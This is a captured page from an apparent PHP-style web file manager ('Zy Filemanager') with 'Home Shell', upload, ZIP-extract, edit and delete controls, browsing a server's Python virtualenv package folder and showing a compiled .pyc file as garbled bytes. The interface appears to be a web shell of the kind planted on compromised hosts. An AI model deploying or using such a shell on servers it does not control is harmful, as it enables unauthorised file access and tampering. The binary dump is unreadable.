⚠️ BACKUP DATA ANDA SECARA TERATUR! File manager ini untuk keperluan teknis.
Zy Filemanager
berang berang bawa gelek berangkat lek !!!
🌙 Dark Mode
🏠 Home Shell
🔄 Refresh
Current Path:
Home Shell
/
opt
/
hc_python
/
lib
/
python3.12
/
site-packages
/
virtualenv
/
seed
/
embed
/
__pycache__
⬆️ Parent Directory
📁 File Browser
Name
Size
Permissions
Modified Date
Actions
📄
__init__.cpython-312.pyc
(174 bytes)
174 B
0644
📅
✏️
✍️
⬇️
🗑️
📄
base_embed.cpython-312.pyc
(5,783 bytes)
5.65 KB
0644
📅
✏️
✍️
⬇️
🗑️
📄
pip_invoke.cpython-312.pyc
(3,870 bytes)
3.78 KB
0644
📅
✏️
✍️
⬇️
🗑️
📤 Upload Files
Single File
Multiple Files
ZIP Extract
ZIP file will be deleted after extraction
➕ Create New
New Folder
New File
✍️ Editing: pip_invoke.cpython-312.pyc
File: /opt/hc_python/lib/python3.12/site-packages/virtualenv/seed/embed/__pycache__/pip_invoke.cpython-312.pyc
Size: 3.78 KB | Last Modified: 2025-04-04 15:08:36
💾 Backup File
🔢 Toggle Line Numbers
� ���g� � � � d dl mZ d dlZd dlmZ d dlmZ d dlmZ d dl m Z d dlmZm Z mZ ej e� Z G d� d e � Zd gZy) � )�annotationsN)�contextmanager)�Popen)�LogCmd)� BaseEmbed)�Version� get_wheel�pip_wheel_env_runc �F � � e Zd Zd� fd�Zd� Zed� � Zed� � Z� xZ S )� PipInvokec �$ �� t �| � |� y �N)�super�__init__)�self�options� __class__s ��O/opt/hc_python/lib/python3.12/site-packages/virtualenv/seed/embed/pip_invoke.pyr zPipInvoke.__init__ s �� � ����!� c �& � | j sy |j j }| j |j |� 5 }t | j | j | j � }| j ||� d d d � y # 1 sw Y y xY wr ) �enabled�interpreter�version_release_str�get_pip_install_cmd�exer �extra_search_dir�app_data�env�_execute)r �creator�for_py_version�cmdr s r �runz PipInvoke.run sj � ��|�|�� �,�,�@�@�� � %� %�g�k�k�>� B�c�#�D�$9�$9�4�=�=�$�(�(�S�C��M�M�#�s�#� C� B� B�s � >B�Bc �� � t j dt | |� � t | |�� }|j � |j dk7 rd|j � �}t |� �|S )Nzpip seed by running: %s)r r zfailed seed with code )�LOGGER�debugr r �communicate� returncode�RuntimeError)r"